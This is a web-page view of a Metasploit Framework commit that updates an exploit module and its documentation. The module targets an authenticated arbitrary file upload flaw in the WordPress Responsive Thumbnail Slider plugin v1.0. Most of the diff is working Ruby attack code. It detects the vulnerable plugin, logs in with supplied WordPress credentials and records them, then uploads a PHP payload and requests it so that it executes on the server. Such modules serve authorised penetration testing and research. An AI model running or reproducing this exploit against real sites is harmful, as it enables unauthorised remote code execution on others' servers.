dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update module and its documentation

This commit is contained in:
Wei Chen 2018-07-26 23:08:20 -05:00
parent be1bf8b1fc
commit 72d634b10b
2 changed files with 59 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md
View File

@ -1,13 +1,16 @@
## Vulnerable Application ## Vulnerable Application
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
v1.0 for WordPress post authentication.
For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).
## Verification Steps ## Verification Steps
1. Install the application 1. Install the application
2. Start msfconsole 2. Start msfconsole
3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]``` 3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
4. Do: ```set RHOSTS [IP]``` 4. Do: ```set RHOSTS [IP]```
5. Do: ```set TARGETURI [URI]``` 5. Do: ```set TARGETURI [URI]```
6. Do: ```set USERNAME [USERNAME]``` 6. Do: ```set USERNAME [USERNAME]```

107
modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
View File

@ -4,21 +4,24 @@
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE include Msf::Exploit::PhpEXE
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{ 'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Arash Khazaei', # EDB PoC 'Author' =>
'Shelby Pace' # Metasploit Module [
], 'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' => 'References' =>
[ [
[ 'EDB', '37998' ] [ 'EDB', '37998' ]
@ -29,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
[ [
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ] [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
], ],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Aug 28 2015", 'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -40,12 +39,42 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ]) OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
]) ])
end end
def check def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end
def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end
nil
end
def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
res = send_request_cgi( res = send_request_cgi(
@ -53,51 +82,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => plugin_uri 'uri' => plugin_uri
) )
unless res && res.code == 200 if res && res.code == 200
return Exploit::CheckCode::Safe vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
return CheckCode::Detected
end end
Exploit::CheckCode::Detected nil
end end
def login def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php') auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
res = send_request_cgi( return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
'method' => 'GET',
'uri' => wp_uri
)
if res && res.body.include?("WordPress") && res.code == 200 store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/') print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
cookies = res.get_cookies auth_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
end end
def upload_payload(cookies) def upload_payload(cookies)
@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload") print_good("Successful upload")
execute = send_request_raw( send_request_cgi(
'uri' => file_uri, 'uri' => file_uri,
'method' => 'GET', 'method' => 'GET',
'cookie' => cookies 'cookie' => cookies
@ -151,8 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
unless check == Exploit::CheckCode::Safe unless check == CheckCode::Safe
login auth_cookies = login
upload_payload(auth_cookies)
end end
end end
end end